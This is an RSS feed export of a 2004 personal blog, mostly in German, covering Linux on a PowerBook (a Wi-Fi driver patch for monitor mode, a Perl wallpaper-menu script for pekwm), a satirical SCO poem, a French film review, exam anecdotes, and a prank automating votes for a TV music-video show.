Verzeichnis /usr/src/linux/drivers/net/wireless/ kopieren und dort folgenden Befehl ausführen: patch -p4 &lt; orinoco-0.13e-2.6.2-patch.diff<br><br>Dummerweise schneits draussen und ich bin erkältet, so dass ich nicht <a href="" title=""><b>spielen</b></a> gehen kann :-(
  12251. ]]></description>
  12252.    <content:encoded><![CDATA[Da es für die im PowerBook eingebaute Airport Extreme WLAN-Karte (Broadcom) keine Linuxtreiber gibt, habe ich vor ein paar Wochen eine <a href="" title="MA401 | Product | Support | NETGEAR"><b>Netgear MA401RA</b></a> günstig erworben (ist ein Auslaufmodell). Für diese hat es im Kernel selbst Treiber.<br><br>Um <a href="" title="PCMCIA mit Linux"><b>PCMCIA</b></a> aufm PowerBook zum Laufen zu bringen benötigte es eine spezielle <a href="" title="config.opts herunterladen"><b>config.opts</b></a>. Nun funktioniert die drahtlose Verbindung problemlos. Jedoch unterstützen die Treiber des Kernels den <a href="" title="Link zur Orinoco-Monitor-Seite ("><b>Monitor-Modus</b></a> nicht, welcher für Spielereien wie <a href="" title="802.11 layer2 wireless network detector, sniffer, and intrusion detection system"><b>Kismet</b></a>, <a href="" title="wireless network discovery and auditing tool"><b>wellenreiter</b></a> etc. benötigt wird. Um diesen Modus nützen zu können müssen zuerst die Treiber <a href="" title="den Patch herunterladen"><b>gepatcht</b></a> werden (der Patch funktioniert partiel auch für 2.6.1 und 2.6.3 Kernel).<br>Dazu einfach den Patch ins Verzeichnis /usr/src/linux/drivers/net/wireless/ kopieren und dort folgenden Befehl ausführen: patch -p4 &lt; orinoco-0.13e-2.6.2-patch.diff<br><br>Dummerweise schneits draussen und ich bin erkältet, so dass ich nicht <a href="" title=""><b>spielen</b></a> gehen kann :-(
  12253. ]]></content:encoded>
  12254.  </item>
  12256.  <item>
  12257.    <title>Sco vs. Linux</title>
  12258.    <link></link>
  12259.    <guid isPermaLink="true"></guid>
  12260.    <dc:creator>Andreas Jaggi</dc:creator>
  12261.    <creativeCommons:license></creativeCommons:license>
  12262.    <pubDate>Sat, 21 Feb 2004 19:00:00 +0100</pubDate>
  12263.    <category domain="">Linux</category>
  12264.    <description><![CDATA[Zehn kleine UNIX Zeilen<br>
  12265. Reicht man ein zur Klage.<br>
  12266. Die eine die auf griechisch war,<br>
  12267. War leider viel zu vage.<br>
  12268. <br>
  12269. Neun kleine UNIX Zeilen<br>
  12270. Sollten es begründen.<br>
  12271. Die eine war trotz größter Müh'<br>
  12272. In LINUX nicht zu finden.<br>
  12273. <br>
  12274. Acht kleine UNIX Zeilen<br>
  12275. Dienten zum Beweise.<br>
  12276. Die eine war aus BSD,<br>
  12277. Pech für Anwalt Heise.<br>
  12278. <br>
  12279. Sieben kleine UNIX Zeilen,<br>
  12280. Kamen vor Gericht.<br>
  12281. Die eine war 'ne Fehlernummer,<br>
  12282. Die taugte dazu nicht.<br>
  12283. <br>
  12284. Sechs kleine UNIX Zeilen,<br>
  12285. Sollten es belegen.<br>
  12286. Doch eine kam zur GPL<br>
  12287. Durch SCO Kollegen.<br>
  12288. <br>
  12289. Fünf kleine UNIX Zeilen<br>
  12290. Waren noch dabei.<br>
  12291. Die eine kam von einem Band<br>
  12292. Mit Aufschrift System Drei.<br>
  12293. <br>
  12294. Vier kleine UNIX Zeilen,<br>
  12295. Doch eine, sonderbar,<br>
  12296. Gehörte nicht zum dem Programm,<br>
  12297. Sie war ein Kommentar.<br>
  12298. <br>
  12299. Drei Kleine UNIX Zeilen,<br>
  12300. Waren das Problem.<br>
  12301. Eine war zwar System Five,<br>
  12302. Doch kam von IBM.<br>
  12303. <br>
  12304. Zwei kleine UNIX Zeilen,<br>
  12305. Waren noch geblieben.<br>
  12306. Die eine war schon reichlich alt<br>
  12307. Und kam von System Sieben.<br>
  12308. <br>
  12309. Eine kleine UNIX Zeile<br>
  12310. Wurde angeführt.<br>
  12311. Die hatte Linus Torvalds selbst<br>
  12312. Am Anfang programmiert.<br>
  12313. <br>
  12314. Ohne eine UNIX Zeile<br>
  12315. Kann SCO nichts machen.<br>
  12316. Doch eines muss man zugestehn:<br>
  12317. Wir hatten was zu lachen.<br>
  12318. <br>
  12319. Schlussbemerkung:<br>
  12320. Hier zeigt sehr schön ein Kinderlied,<br>
  12321. Warum McBride die Wahrheit mied.<br>
  12322. <br>
  12323. <br>
  12324. Ausm <a href=";msg_id=5143681&amp;forum_id=53189"><b>heise online-Leserforum</b></a> via <a href=""><b></b></a>
  12325. ]]></description>
  12326.    <content:encoded><![CDATA[Zehn kleine UNIX Zeilen<br>
  12327. Reicht man ein zur Klage.<br>
  12328. Die eine die auf griechisch war,<br>
  12329. War leider viel zu vage.<br>
  12330. <br>
  12331. Neun kleine UNIX Zeilen<br>
  12332. Sollten es begründen.<br>
  12333. Die eine war trotz größter Müh'<br>
  12334. In LINUX nicht zu finden.<br>
  12335. <br>
  12336. Acht kleine UNIX Zeilen<br>
  12337. Dienten zum Beweise.<br>
  12338. Die eine war aus BSD,<br>
  12339. Pech für Anwalt Heise.<br>
  12340. <br>
  12341. Sieben kleine UNIX Zeilen,<br>
  12342. Kamen vor Gericht.<br>
  12343. Die eine war 'ne Fehlernummer,<br>
  12344. Die taugte dazu nicht.<br>
  12345. <br>
  12346. Sechs kleine UNIX Zeilen,<br>
  12347. Sollten es belegen.<br>
  12348. Doch eine kam zur GPL<br>
  12349. Durch SCO Kollegen.<br>
  12350. <br>
  12351. Fünf kleine UNIX Zeilen<br>
  12352. Waren noch dabei.<br>
  12353. Die eine kam von einem Band<br>
  12354. Mit Aufschrift System Drei.<br>
  12355. <br>
  12356. Vier kleine UNIX Zeilen,<br>
  12357. Doch eine, sonderbar,<br>
  12358. Gehörte nicht zum dem Programm,<br>
  12359. Sie war ein Kommentar.<br>
  12360. <br>
  12361. Drei Kleine UNIX Zeilen,<br>
  12362. Waren das Problem.<br>
  12363. Eine war zwar System Five,<br>
  12364. Doch kam von IBM.<br>
  12365. <br>
  12366. Zwei kleine UNIX Zeilen,<br>
  12367. Waren noch geblieben.<br>
  12368. Die eine war schon reichlich alt<br>
  12369. Und kam von System Sieben.<br>
  12370. <br>
  12371. Eine kleine UNIX Zeile<br>
  12372. Wurde angeführt.<br>
  12373. Die hatte Linus Torvalds selbst<br>
  12374. Am Anfang programmiert.<br>
  12375. <br>
  12376. Ohne eine UNIX Zeile<br>
  12377. Kann SCO nichts machen.<br>
  12378. Doch eines muss man zugestehn:<br>
  12379. Wir hatten was zu lachen.<br>
  12380. <br>
  12381. Schlussbemerkung:<br>
  12382. Hier zeigt sehr schön ein Kinderlied,<br>
  12383. Warum McBride die Wahrheit mied.<br>
  12384. <br>
  12385. <br>
  12386. Ausm <a href=";msg_id=5143681&amp;forum_id=53189"><b>heise online-Leserforum</b></a> via <a href=""><b></b></a>
  12387. ]]></content:encoded>
  12388.  </item>
  12390.  <item>
  12391.    <title>Les Rivières pourpres 2 - les anges de l'apocalypse</title>
  12392.    <link></link>
  12393.    <guid isPermaLink="true"></guid>
  12394.    <dc:creator>Andreas Jaggi</dc:creator>
  12395.    <creativeCommons:license></creativeCommons:license>
  12396.    <pubDate>Sat, 21 Feb 2004 17:02:00 +0100</pubDate>
  12397.    <category domain="">Cinema</category>
  12398.    <description><![CDATA[Dans les stations du métro de Paris il y a partout des affiches pour <a href=""><b>"Les Rivières pourpres 2"</b></a>. Alors j'ai suivi cettes affiches et je suis aller regarder le film le mercredi soir dans un cinéma située à <a href=""><b>"les halles"</b></a>.<br><br><a href=""><b>Olivier Dahan</b></a> a créé le film en utilisant beaucoup de lumière colorée qui produit une ambiance spéciale. De plus le film me plait beaucoup car <a href=""><b>Jean Reno</b></a> y joue le rôle d'un commissaire.
  12399. ]]></description>
  12400.    <content:encoded><![CDATA[Dans les stations du métro de Paris il y a partout des affiches pour <a href=""><b>"Les Rivières pourpres 2"</b></a>. Alors j'ai suivi cettes affiches et je suis aller regarder le film le mercredi soir dans un cinéma située à <a href=""><b>"les halles"</b></a>.<br><br><a href=""><b>Olivier Dahan</b></a> a créé le film en utilisant beaucoup de lumière colorée qui produit une ambiance spéciale. De plus le film me plait beaucoup car <a href=""><b>Jean Reno</b></a> y joue le rôle d'un commissaire.
  12401. ]]></content:encoded>
  12402.  </item>
  12404.  <item>
  12405.    <title>T minus 16560s</title>
  12406.    <link></link>
  12407.    <guid isPermaLink="true"></guid>
  12408.    <dc:creator>Andreas Jaggi</dc:creator>
  12409.    <creativeCommons:license></creativeCommons:license>
  12410.    <pubDate>Mon, 16 Feb 2004 01:24:00 +0100</pubDate>
  12411.    <category domain="">Misc</category>
  12412.    <description><![CDATA[<a href="" title="Paris"><b>Paris</b></a>
  12413. ]]></description>
  12414.    <content:encoded><![CDATA[<a href="" title="Paris"><b>Paris</b></a>
  12415. ]]></content:encoded>
  12416.  </item>
  12418.  <item>
  12419.    <title>sutfym</title>
  12420.    <link></link>
  12421.    <guid isPermaLink="true"></guid>
  12422.    <dc:creator>Andreas Jaggi</dc:creator>
  12423.    <creativeCommons:license></creativeCommons:license>
  12424.    <pubDate>Wed, 11 Feb 2004 01:11:00 +0100</pubDate>
  12425.    <category domain="">Misc</category>
  12426.    <description><![CDATA[<img src="" width="420" height="444" alt="shut up the fuck. you must"><br><br>Via <a href=""><b>Galez Guy of the Day</b></a>
  12427. ]]></description>
  12428.    <content:encoded><![CDATA[<img src="" width="420" height="444" alt="shut up the fuck. you must"><br><br>Via <a href=""><b>Galez Guy of the Day</b></a>
  12429. ]]></content:encoded>
  12430.  </item>
  12432.  <item>
  12433.    <title>Pröbelei</title>
  12434.    <link></link>
  12435.    <guid isPermaLink="true"></guid>
  12436.    <dc:creator>Andreas Jaggi</dc:creator>
  12437.    <creativeCommons:license></creativeCommons:license>
  12438.    <pubDate>Tue, 03 Feb 2004 17:03:00 +0100</pubDate>
  12439.    <category domain="">School</category>
  12440.    <description><![CDATA[Heute Morgen eine Probe in "Introduction aux systèmes informatiques" gehabt. Lustigerweise hat der Professor, dessen Unterricht und Übungen das ganze Semester hindurch supereinfach waren, nun eine Probe geschrieben, die nicht damit vergleichbar ist, sondern viel viel schwerer war. Da mir dieses Gebiet etwas liegt, war die Probe trotzdem ziemlich gut verlaufen.<br>Am Nachmittag dann Probe in Elektronik. Hier hat der Dozent, quasi die genau gleichen Aufgaben gegeben, die er vor einer Woche als Probevorbereitung mit der ganzen Klasse vorgelöst hatte. Weil ich beim Elektronik jedoch nicht so ganz mitkomme, wird diese Probe vermutlich gerade genügend werden.<br>Vor einer Stunde Probe in "Design industriel". 6 Aufgaben, 5 davon von einer netten Architekturstudentin abgeschrieben, als Sie mich fragt, ob ich noch etwas nicht wisse, legt Sie mir auch noch Ihre Lösung für die 6. Aufgabe hin. :-)<br>Nunja, in der Reihe vor mir, haben zwei die Probe gelöst, indem Sie die Lösungen mit dem Laptop im Internet nachgeschlagen haben.<br><br>Leider zählt vor allem die Elektronikprobe (Koeffizient 3 oder 4 von insgesamt 12). "Introduction aux systèmes informatiques" zählt fast nichts (Koeffizient 1 oder2) und "Design Industriel" überhaupt nichts (Koeffizient 0.25) :-(
  12441. ]]></description>
  12442.    <content:encoded><![CDATA[Heute Morgen eine Probe in "Introduction aux systèmes informatiques" gehabt. Lustigerweise hat der Professor, dessen Unterricht und Übungen das ganze Semester hindurch supereinfach waren, nun eine Probe geschrieben, die nicht damit vergleichbar ist, sondern viel viel schwerer war. Da mir dieses Gebiet etwas liegt, war die Probe trotzdem ziemlich gut verlaufen.<br>Am Nachmittag dann Probe in Elektronik. Hier hat der Dozent, quasi die genau gleichen Aufgaben gegeben, die er vor einer Woche als Probevorbereitung mit der ganzen Klasse vorgelöst hatte. Weil ich beim Elektronik jedoch nicht so ganz mitkomme, wird diese Probe vermutlich gerade genügend werden.<br>Vor einer Stunde Probe in "Design industriel". 6 Aufgaben, 5 davon von einer netten Architekturstudentin abgeschrieben, als Sie mich fragt, ob ich noch etwas nicht wisse, legt Sie mir auch noch Ihre Lösung für die 6. Aufgabe hin. :-)<br>Nunja, in der Reihe vor mir, haben zwei die Probe gelöst, indem Sie die Lösungen mit dem Laptop im Internet nachgeschlagen haben.<br><br>Leider zählt vor allem die Elektronikprobe (Koeffizient 3 oder 4 von insgesamt 12). "Introduction aux systèmes informatiques" zählt fast nichts (Koeffizient 1 oder2) und "Design Industriel" überhaupt nichts (Koeffizient 0.25) :-(
  12443. ]]></content:encoded>
  12444.  </item>
  12446.  <item>
  12447.    <title>Mars</title>
  12448.    <link></link>
  12449.    <guid isPermaLink="true"></guid>
  12450.    <dc:creator>Andreas Jaggi</dc:creator>
  12451.    <creativeCommons:license></creativeCommons:license>
  12452.    <pubDate>Tue, 27 Jan 2004 18:08:00 +0100</pubDate>
  12453.    <category domain="">Misc</category>
  12454.    <description><![CDATA[<img src="" alt="Erde auf Mars"><br><br>Gefunden bei <a href=""><b>mindtrap</b></a>
  12455. ]]></description>
  12456.    <content:encoded><![CDATA[<img src="" alt="Erde auf Mars"><br><br>Gefunden bei <a href=""><b>mindtrap</b></a>
  12457. ]]></content:encoded>
  12458.  </item>
  12460.  <item>
  12461.    <title>lmud-0.02-fg-1.tar</title>
  12462.    <link></link>
  12463.    <guid isPermaLink="true"></guid>
  12464.    <dc:creator>Andreas Jaggi</dc:creator>
  12465.    <creativeCommons:license></creativeCommons:license>
  12466.    <pubDate>Wed, 21 Jan 2004 09:48:00 +0100</pubDate>
  12467.    <category domain="">Linux</category>
  12468.    <description><![CDATA[<a href=""><b>lmud-0.02-fg-1.tar</b></a> ist verfügbar. Neu mit Kontrolle der Displayhelligkeit und einem "smooth"en Helligkeitswechsel.
  12469. ]]></description>
  12470.    <content:encoded><![CDATA[<a href=""><b>lmud-0.02-fg-1.tar</b></a> ist verfügbar. Neu mit Kontrolle der Displayhelligkeit und einem "smooth"en Helligkeitswechsel.
  12471. ]]></content:encoded>
  12472.  </item>
  12474.  <item>
  12475.    <title>lmud-0.01.tar.gz</title>
  12476.    <link></link>
  12477.    <guid isPermaLink="true"></guid>
  12478.    <dc:creator>Andreas Jaggi</dc:creator>
  12479.    <creativeCommons:license></creativeCommons:license>
  12480.    <pubDate>Sun, 18 Jan 2004 13:28:00 +0100</pubDate>
  12481.    <category domain="">Mac</category>
  12482.    <description><![CDATA[In der debian-powerpc-Mailingliste hat Alexander Clausen, ein kleines Programm veröffentlicht, mit dem man beim PowerBook die Tastaturbeleuchtung steuern und die Lichtsensore abfragen kann. Dank meiner nicht vorhandenen C-Kentnisse, ist nun ein quick'n'dirty daemon dazu entstanden, der ab einer gewissen Dunkelheit automatisch die Tastaturbeleuchtung einschaltet. <a href=""><b>lmud-0.01.tar.gz</b></a>
  12483. ]]></description>
  12484.    <content:encoded><![CDATA[In der debian-powerpc-Mailingliste hat Alexander Clausen, ein kleines Programm veröffentlicht, mit dem man beim PowerBook die Tastaturbeleuchtung steuern und die Lichtsensore abfragen kann. Dank meiner nicht vorhandenen C-Kentnisse, ist nun ein quick'n'dirty daemon dazu entstanden, der ab einer gewissen Dunkelheit automatisch die Tastaturbeleuchtung einschaltet. <a href=""><b>lmud-0.01.tar.gz</b></a>
  12485. ]]></content:encoded>
  12486.  </item>
  12488.  <item>
  12489.    <title>Mac OS X Ext2 Filesystem</title>
  12490.    <link></link>
  12491.    <guid isPermaLink="true"></guid>
  12492.    <dc:creator>Andreas Jaggi</dc:creator>
  12493.    <creativeCommons:license></creativeCommons:license>
  12494.    <pubDate>Thu, 15 Jan 2004 11:37:00 +0100</pubDate>
  12495.    <category domain="">Mac</category>
  12496.    <description><![CDATA[Durch <a href=""><b>ext2fsx</b></a> wird ein für mich bisher gravierendes Problem gelöst: Lese- und Schreibzugriff auf eine Partition mit Linux <b>und</b> MacOS X.
  12497. ]]></description>
  12498.    <content:encoded><![CDATA[Durch <a href=""><b>ext2fsx</b></a> wird ein für mich bisher gravierendes Problem gelöst: Lese- und Schreibzugriff auf eine Partition mit Linux <b>und</b> MacOS X.
  12499. ]]></content:encoded>
  12500.  </item>
  12502.  <item>
  12503.    <title>GNUpg und Apple Mail</title>
  12504.    <link></link>
  12505.    <guid isPermaLink="true"></guid>
  12506.    <dc:creator>Andreas Jaggi</dc:creator>
  12507.    <creativeCommons:license></creativeCommons:license>
  12508.    <pubDate>Tue, 13 Jan 2004 18:07:00 +0100</pubDate>
  12509.    <category domain="">Mac</category>
  12510.    <description><![CDATA[Dank <a href=""><b>Mac GPG</b></a> und <a href=""><b>PGP for Apple Mail</b></a> kann ich nun auch mit MacOS X verschlüsselte Mails benutzen.
  12511. ]]></description>
  12512.    <content:encoded><![CDATA[Dank <a href=""><b>Mac GPG</b></a> und <a href=""><b>PGP for Apple Mail</b></a> kann ich nun auch mit MacOS X verschlüsselte Mails benutzen.
  12513. ]]></content:encoded>
  12514.  </item>
  12516.  <item>
  12517.    <title>OggVorbis in iTunes</title>
  12518.    <link></link>
  12519.    <guid isPermaLink="true"></guid>
  12520.    <dc:creator>Andreas Jaggi</dc:creator>
  12521.    <creativeCommons:license></creativeCommons:license>
  12522.    <pubDate>Mon, 12 Jan 2004 13:11:00 +0100</pubDate>
  12523.    <category domain="">Mac</category>
  12524.    <description><![CDATA[Nach längerem suchen, habe ich endlich etwas gefunden, womit ich in iTunes (Mac OSX 10.3.??) OggVorbis-Dateien abspielen kann: <a href=""><b>OggVorbis.component</b></a>, einfach in /Library/QuickTime/ kopieren und die Qualität von OggVorbis geniessen.
  12525. ]]></description>
  12526.    <content:encoded><![CDATA[Nach längerem suchen, habe ich endlich etwas gefunden, womit ich in iTunes (Mac OSX 10.3.??) OggVorbis-Dateien abspielen kann: <a href=""><b>OggVorbis.component</b></a>, einfach in /Library/QuickTime/ kopieren und die Qualität von OggVorbis geniessen.
  12527. ]]></content:encoded>
  12528.  </item>
  12530.  <item>
  12531.    <title></title>
  12532.    <link></link>
  12533.    <guid isPermaLink="true"></guid>
  12534.    <dc:creator>Andreas Jaggi</dc:creator>
  12535.    <creativeCommons:license></creativeCommons:license>
  12536.    <pubDate>Sun, 11 Jan 2004 14:07:00 +0100</pubDate>
  12537.    <category domain="">Linux</category>
  12538.    <description><![CDATA[Ich habe mein <a href=""><b>Wallpaper-Script</b></a> noch ein bisschen ausgebaut. Nun wird das ausgewählte Bild in ~/.pekwm/start eingetragen, damit es bei jedem Start von pekwm automatisch geladen wird.
  12539. <br><br>
  12540. <pre>#!/usr/bin/perl
  12541. #
  12542. # 2003 by x-way -
  12543. #
  12544. # Add this to your menu, if you have pekwm's dynamic menu support:
  12545. #
  12546. # SubMenu = "Backgrounds" {
  12547. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  12548. # }
  12549. #
  12551. use warnings "all";
  12552. use strict;
  12554. if($ARGV[0] eq '-set') {
  12555.        my $wallpaper = $ARGV[1];
  12557.        open(PKCONF, "&lt;$ENV{HOME}/.pekwm/start") or die "Can't open ~/.pekwm/start";
  12558.        my @file = &lt;PKCONF&gt;;
  12559.        close(PKCONF);
  12561.        my @file2 = ();
  12562.        my $set = '';
  12564.        foreach (@file) {
  12565.                s/^xsetbg -center ".*"/xsetbg -center "$wallpaper"/gi;
  12566.                push(@file2, $_);
  12568.                if(index($_, 'xsetbg -center') == 0) {
  12569.                        $set = $_;
  12570.                }
  12571.        };
  12573.        if($set eq "") {
  12574.                push(@file2, "xsetbg -center \"".$wallpaper."\"");
  12575.        }
  12577.        open(PKCONF, "&gt;$ENV{HOME}/.pekwm/start") or die "Can't write ~/.pekwm/start";
  12578.        print(PKCONF @file2);
  12579.        close(PKCONF);
  12580. } else {
  12582.        print("Dynamic {\n");
  12584.        for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  12585.                my $dir = $ARGV[$i];
  12587.                opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  12588.                my @backgrounds = grep { (! /^\./) } readdir(DIR);
  12589.                closedir DIR;
  12591.                foreach my $x (@backgrounds) {
  12592.                        my $y = $x;
  12593.                        $y =~ s+.*/++g;
  12595.                        if(! -d "$dir/$x") {
  12596.                                $y =~ s/\.[^\.]*$//g;
  12597.                                $y =~ s/(_|-)[0-9]{3,4}(x[0-9]{3,4}|)//g;
  12598.                                $y =~ s/_/ /g;
  12599.                                $y =~ s/%20/ /g;
  12600.                                print("Entry = \"$y\" { Actions = \"Exec xsetbg -center \\\"$dir/$x\\\" &amp;&amp; $0 -set \\\"$dir/$x\\\" \" }\n");
  12601.                        } else {
  12602.                                print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 \\\"$dir/$x\\\" \" }\n}");
  12603.                        }
  12604.                }
  12605.        }
  12607.        print("}\n");
  12608. }</pre>
  12609. ]]></description>
  12610.    <content:encoded><![CDATA[Ich habe mein <a href=""><b>Wallpaper-Script</b></a> noch ein bisschen ausgebaut. Nun wird das ausgewählte Bild in ~/.pekwm/start eingetragen, damit es bei jedem Start von pekwm automatisch geladen wird.
  12611. <br><br>
  12612. <pre>#!/usr/bin/perl
  12613. #
  12614. # 2003 by x-way -
  12615. #
  12616. # Add this to your menu, if you have pekwm's dynamic menu support:
  12617. #
  12618. # SubMenu = "Backgrounds" {
  12619. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  12620. # }
  12621. #
  12623. use warnings "all";
  12624. use strict;
  12626. if($ARGV[0] eq '-set') {
  12627.        my $wallpaper = $ARGV[1];
  12629.        open(PKCONF, "&lt;$ENV{HOME}/.pekwm/start") or die "Can't open ~/.pekwm/start";
  12630.        my @file = &lt;PKCONF&gt;;
  12631.        close(PKCONF);
  12633.        my @file2 = ();
  12634.        my $set = '';
  12636.        foreach (@file) {
  12637.                s/^xsetbg -center ".*"/xsetbg -center "$wallpaper"/gi;
  12638.                push(@file2, $_);
  12640.                if(index($_, 'xsetbg -center') == 0) {
  12641.                        $set = $_;
  12642.                }
  12643.        };
  12645.        if($set eq "") {
  12646.                push(@file2, "xsetbg -center \"".$wallpaper."\"");
  12647.        }
  12649.        open(PKCONF, "&gt;$ENV{HOME}/.pekwm/start") or die "Can't write ~/.pekwm/start";
  12650.        print(PKCONF @file2);
  12651.        close(PKCONF);
  12652. } else {
  12654.        print("Dynamic {\n");
  12656.        for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  12657.                my $dir = $ARGV[$i];
  12659.                opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  12660.                my @backgrounds = grep { (! /^\./) } readdir(DIR);
  12661.                closedir DIR;
  12663.                foreach my $x (@backgrounds) {
  12664.                        my $y = $x;
  12665.                        $y =~ s+.*/++g;
  12667.                        if(! -d "$dir/$x") {
  12668.                                $y =~ s/\.[^\.]*$//g;
  12669.                                $y =~ s/(_|-)[0-9]{3,4}(x[0-9]{3,4}|)//g;
  12670.                                $y =~ s/_/ /g;
  12671.                                $y =~ s/%20/ /g;
  12672.                                print("Entry = \"$y\" { Actions = \"Exec xsetbg -center \\\"$dir/$x\\\" &amp;&amp; $0 -set \\\"$dir/$x\\\" \" }\n");
  12673.                        } else {
  12674.                                print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 \\\"$dir/$x\\\" \" }\n}");
  12675.                        }
  12676.                }
  12677.        }
  12679.        print("}\n");
  12680. }</pre>
  12681. ]]></content:encoded>
  12682.  </item>
  12684.  <item>
  12685.    <title>pekwm</title>
  12686.    <link></link>
  12687.    <guid isPermaLink="true"></guid>
  12688.    <dc:creator>Andreas Jaggi</dc:creator>
  12689.    <creativeCommons:license></creativeCommons:license>
  12690.    <pubDate>Sun, 04 Jan 2004 01:28:00 +0100</pubDate>
  12691.    <category domain="">Coding</category>
  12692.    <description><![CDATA[Nachdem ich alle <a href=""><b>Kandidaten</b></a> etwas getestet habe, bin ich bei <a href=""><b>pekwm</b></a> hängengeblieben.<br><br>"pewkm ist ein kleiner, schneller, funktioneller und flexibler Windowmanager, der versucht nett (hübsch) zu sein während dem er klein bleibt."<br>So wird er in der Doku beschrieben. Er besitzt viele Features: so kann man zum Beispiel damit wie beim pwm mehrere Fenster zusammenfassen.<br>Das Rootmenü, welches auf die linke (!) Maustaste belegt ist, lässt sich sehr gut anpassen, da es möglich ist, die Menüeinträge dynamisch zu generieren. Dieses Feature ist ideal, um meine Wallpaper ins Menü einzubinden, ohne für jedes einen Eintrag schreiben zu müssen.<br>So ist ein kleines Perl-Skript entstanden, das als Parameter Verzeichnisse mit Bilddateien entgegennimmt, diese rekursiv durchsucht, die gefundenen Bilder ins Menü integriert (die Dateinamen werden noch etwas beschönigt) und ihnen mittels xsetbg eine Handlung anzufügt.
  12693. <br><br>
  12694. <pre>
  12695. #!/usr/bin/perl
  12696. #
  12697. # 2003 by x-way -
  12698. #
  12699. # Add this to your menu, if you have pekwm's dynamic menu support:
  12700. #
  12701. # SubMenu = "Backgrounds" {
  12702. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  12703. # }
  12704. #
  12706. use warnings "all";
  12707. use strict;
  12710. print("Dynamic {\n");
  12712. for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  12713.        my $dir = $ARGV[$i];
  12715.        opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  12716.        my @backgrounds = grep { (! /^\./) } readdir(DIR);
  12717.        closedir DIR;
  12719.        foreach my $x (@backgrounds) {
  12720.                my $y = $x;
  12721.                $y =~ s+.*/++g;
  12723.                if(! -d "$dir/$x") {
  12724.                        $y =~ s/\..*$//g;
  12725.                        $y =~ s/_[0-9]{3,4}x[0-9]{3,4}//g;
  12726.                        print("Entry = \"$y\" { Actions = \"Exec xsetbg -center $dir/$x \" }\n");
  12727.                } else {
  12728.                        print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 $dir/$x\" }\n}");
  12729.                }
  12730.        }
  12731. }
  12733. print("}\n");
  12734. </pre>
  12735. ]]></description>
  12736.    <content:encoded><![CDATA[Nachdem ich alle <a href=""><b>Kandidaten</b></a> etwas getestet habe, bin ich bei <a href=""><b>pekwm</b></a> hängengeblieben.<br><br>"pewkm ist ein kleiner, schneller, funktioneller und flexibler Windowmanager, der versucht nett (hübsch) zu sein während dem er klein bleibt."<br>So wird er in der Doku beschrieben. Er besitzt viele Features: so kann man zum Beispiel damit wie beim pwm mehrere Fenster zusammenfassen.<br>Das Rootmenü, welches auf die linke (!) Maustaste belegt ist, lässt sich sehr gut anpassen, da es möglich ist, die Menüeinträge dynamisch zu generieren. Dieses Feature ist ideal, um meine Wallpaper ins Menü einzubinden, ohne für jedes einen Eintrag schreiben zu müssen.<br>So ist ein kleines Perl-Skript entstanden, das als Parameter Verzeichnisse mit Bilddateien entgegennimmt, diese rekursiv durchsucht, die gefundenen Bilder ins Menü integriert (die Dateinamen werden noch etwas beschönigt) und ihnen mittels xsetbg eine Handlung anzufügt.
  12737. <br><br>
  12738. <pre>
  12739. #!/usr/bin/perl
  12740. #
  12741. # 2003 by x-way -
  12742. #
  12743. # Add this to your menu, if you have pekwm's dynamic menu support:
  12744. #
  12745. # SubMenu = "Backgrounds" {
  12746. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  12747. # }
  12748. #
  12750. use warnings "all";
  12751. use strict;
  12754. print("Dynamic {\n");
  12756. for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  12757.        my $dir = $ARGV[$i];
  12759.        opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  12760.        my @backgrounds = grep { (! /^\./) } readdir(DIR);
  12761.        closedir DIR;
  12763.        foreach my $x (@backgrounds) {
  12764.                my $y = $x;
  12765.                $y =~ s+.*/++g;
  12767.                if(! -d "$dir/$x") {
  12768.                        $y =~ s/\..*$//g;
  12769.                        $y =~ s/_[0-9]{3,4}x[0-9]{3,4}//g;
  12770.                        print("Entry = \"$y\" { Actions = \"Exec xsetbg -center $dir/$x \" }\n");
  12771.                } else {
  12772.                        print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 $dir/$x\" }\n}");
  12773.                }
  12774.        }
  12775. }
  12777. print("}\n");
  12778. </pre>
  12779. ]]></content:encoded>
  12780.  </item>
  12782.  <item>
  12783.    <title>Roboclip</title>
  12784.    <link></link>
  12785.    <guid isPermaLink="true"></guid>
  12786.    <dc:creator>Andreas Jaggi</dc:creator>
  12787.    <creativeCommons:license></creativeCommons:license>
  12788.    <pubDate>Fri, 02 Jan 2004 16:17:00 +0100</pubDate>
  12789.    <category domain="">Misc</category>
  12790.    <description><![CDATA[Ich hab heut Nachmittag kurz durchs Fernsehprogramm gezappt. Dabei bin ich bei <a href=""><b>Roboclip</b></a> hängen geblieben. Das ist eine automatisierte Sendung, welche Musikvideos abspielt. Für das abzuspielende Musikvideo kann man per Telefon, SMS oder Internet stimmen. Das hat mich als Internet-Junkie natürlich interessiert und ich musste das ausprobieren. Leider kann man für ein Musikvideo nur einmal stimmen, aber um die einigermassen hörbaren Musikvideos abspielen zu lassen braucht es so rund 100 Stimmen. Die Stimmenregistrierung erfolgt mit einem PHP-Script, das Cookies verwendet. Da ich eine Veranlagung zum Experimentieren habe, hats nicht lange gedauert und ich habe nun ein kleines Shell-Skript, das mittels wget das Stimmen für ein Musikvideo automatisiert.<br><br>So ist es nun gekommen, dass "Apocalyptica Feat. Nina Hagen - Seemann" und "Metallica - Frantic", welche fast keine Stimmen hatten, plötzlich gerade nacheinander abgespielt wurden ;-) Danach war leider die Sendezeit von Roboclip zuende :-)
  12791. ]]></description>
